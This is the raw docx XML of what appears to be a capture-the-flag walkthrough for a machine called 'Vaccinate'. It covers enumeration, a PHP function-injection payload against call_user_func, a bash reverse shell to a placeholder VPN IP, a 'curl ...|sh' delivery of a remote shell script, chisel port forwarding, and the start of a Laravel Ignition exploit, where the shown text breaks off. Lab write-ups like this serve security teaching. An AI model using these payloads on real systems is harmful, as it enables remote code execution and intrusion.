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Vaccinate</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fmfolv8bh4hj"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je6a7nd3m4"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298700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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ptyccq7g8ja8"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0F">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111 – RPCBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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vu5uukeqscff" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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gcernfly8lg3" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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1803400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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hwiy8x2lsqik" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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from that wordlist, then checks the HTTP status code. (If you are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 or you can use those from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecLists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19500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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an interesting file → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notes.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Reading this file, we can find the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53"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the hint provided, we know that the back-end is using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">call_user_func</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function.</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fill out the form and then intercept the request using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp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84"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f0hqzlsi7qra" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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1917700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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h3bqdfkwuibj" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Function Injection</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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Function Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack consists of inserting or “injecting” a function name supplied by the client into the application. A successful function injection exploit can execute any built-in or user-defined function. Function injection attacks are a type of injection attack in which arbitrary function names, sometimes with parameters, are injected into the application and executed. If parameters are passed to the injected function, this can lead to Remote Code Execution.</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5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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var_dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function (this function displays structured information about one or more expressions, including their type and value. Arrays and objects are explored recursively with values indented for readability), we can see that it is an array with 4 positions.</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that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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in the first position, we can call the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 Since this function receives a parameter, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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in the first position, we can inject our commands there.</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we have a problem: the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 does not accept an array as a parameter, but rather a string.</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74"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our final payload will look like this:</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data=ls&amp;usuario[submit]=system</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removing the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 from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we change it from an array to a string, which is what the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 expects.</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6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that we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will obtain a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell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A">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pm4is3ce55ym" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell payload in bash:</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/dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1'</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Python server:</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6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7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send the payload through Burp:</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data=curl+&lt;IP-VPN&gt;/shell.sh|sh&amp;usuario[submit]=system</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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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Immediately after sending it, we receive the connection.</w:t>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7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gozbxf81d0mb" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell TTY</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83"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of the system →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can find our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">second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6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tk10a2vanhn1" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>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e6ezy23j3hmx" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>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nittipe5hbvy" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>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the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -nlapt. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that port 8000 is running internally.</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6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command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep root. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see that the service running on that port is executed by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user.</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49400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 127.0.0.1:8000. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We identify that it is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laravel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> application.</w:t>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82"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perform </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which basically means forwarding the connection from port 8000 to our local machine so we can access the page in our browser. For this, we will use the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel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hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz</w:t>
        </w:r>
      </w:hyperlink>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chisel on our machine, we will upload it to the server.</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6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76"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transferring chisel to the server, execute:</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server -p 9000 --reverse</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75"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./chisel client &lt;IP-VPN&gt;:9000 R:8000:127.0.0.1:8000</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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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can open the website in our browser → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1:8000</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it, we see that Laravel is running with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">debug on mode enabled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62"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Researching Laravel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">debug on mode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploits, we find that the vulnerability occurs in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ignition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hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ignition</w:t>
        </w:r>
      </w:hyperlink>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a beautiful and customizable error page for Laravel applications running on Laravel 5.5 up to Laravel 8. It is the default error page generator starting from Laravel 6. It also allows publicly sharing errors. If configured with a valid </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Flare</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">API key, production application errors can be tracked and notifications sent.</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Ignition versions prior to 2.5.2, as used in Laravel and other products, allow unauthenticated remote attackers to execute arbitrary code.</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vulnerability lies in how the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file_get_contents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function is implemented in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MakeViewVariableOptionalSolution.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module of Ignition. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file_get_contents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function does not properly validate the path, and an attacker can abuse this weakness to view and write arbitrary code to a path specified by the attacker.</w:t>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find the exploit on GitHub:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ambionics/laravel-exploits</w:t>
        </w:r>
      </w:hyperlink>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also need to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpggc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be found here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
